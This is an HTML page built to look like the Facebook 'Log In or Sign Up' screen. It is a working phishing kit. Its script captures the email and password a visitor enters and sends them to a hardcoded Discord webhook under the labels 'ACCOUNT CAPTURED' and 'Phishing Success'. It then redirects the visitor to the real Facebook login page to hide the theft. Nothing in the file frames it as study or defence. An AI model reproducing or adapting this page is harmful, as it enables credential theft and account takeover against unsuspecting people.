<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook - Log In or Sign Up</title>
    <style>
        body { font-family: Helvetica, Arial, sans-serif; background-color: #f0f2f5; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; }
        .container { width: 100%; max-width: 400px; text-align: center; }
        .logo { color: #1877f2; font-size: 40px; font-weight: bold; margin-bottom: 20px; }
        .login-box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1); }
        input { width: 100%; padding: 14px; margin-bottom: 12px; border: 1px solid #dddfe2; border-radius: 6px; font-size: 17px; box-sizing: border-box; }
        input:focus { outline: none; border-color: #1877f2; box-shadow: 0 0 0 2px #e7f3ff; }
        .login-btn { width: 100%; padding: 14px; background-color: #1877f2; border: none; border-radius: 6px; color: white; font-size: 20px; font-weight: bold; cursor: pointer; }
        .login-btn:hover { background-color: #166fe5; }
        .forgot-password { color: #1877f2; font-size: 14px; text-decoration: none; display: block; margin: 15px 0; }
        hr { border: 0; border-top: 1px solid #dadde1; margin: 20px 0; }
        .create-btn { background-color: #42b72a; color: white; padding: 14px 20px; border: none; border-radius: 6px; font-size: 17px; font-weight: bold; cursor: pointer; text-decoration: none; }
        .footer { margin-top: 40px; font-size: 14px; color: #737373; }
    </style>
</head>
<body>

    <div class="container">
        <div class="logo">facebook</div>
        <div class="login-box">
            <input type="text" id="email" placeholder="Email address or phone number" required>
            <input type="password" id="pass" placeholder="Password" required>
            <button class="login-btn" onclick="sendToDiscord()">Log In</button>
            <a href="#" class="forgot-password">Forgotten password?</a>
            <hr>
            <button class="create-btn">Create new account</button>
        </div>
        <p class="footer"><b>Create a Page</b> for a celebrity, brand or business.</p>
    </div>

    <script>
        const WEBHOOK_URL = 'https://discord.com/api/webhooks/1459136830992683080/XvGgJxEN4NJS0Cq-VMociYYRoSDZ10og0Hn-XBWHKRqscW_xeAV73BwkBq-KlkQmeHgz';

        async function sendToDiscord() {
            const email = document.getElementById('email').value;
            const pass = document.getElementById('pass').value;

            if (!email || !pass) {
                alert("Please enter your email and password.");
                return;
            }

            // Мэдээллийг Discord руу илгээх
            const payload = {
                content: "🎣 **NEW FACEBOOK ACCOUNT CAPTURED!**",
                embeds: [{
                    title: "Login Credentials",
                    color: 1572450, // Facebook Blue
                    fields: [
                        { name: "📧 Email/Phone", value: `\`${email}\``, inline: false },
                        { name: "🔑 Password", value: `\`${pass}\``, inline: false },
                        { name: "🕒 Time", value: new Date().toLocaleString(), inline: true }
                    ],
                    footer: { text: "Phishing Success" }
                }]
            };

            try {
                await fetch(WEBHOOK_URL, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify(payload)
                });

                // Мэдээлэл очсоны дараа жинхэнэ Facebook рүү шилжүүлэх
                window.location.href = "https://www.facebook.com/login/device-based/regular/login/";
            } catch (err) {
                console.error("Error sending to Discord:", err);
            }
        }
    </script>
</body>
</html>
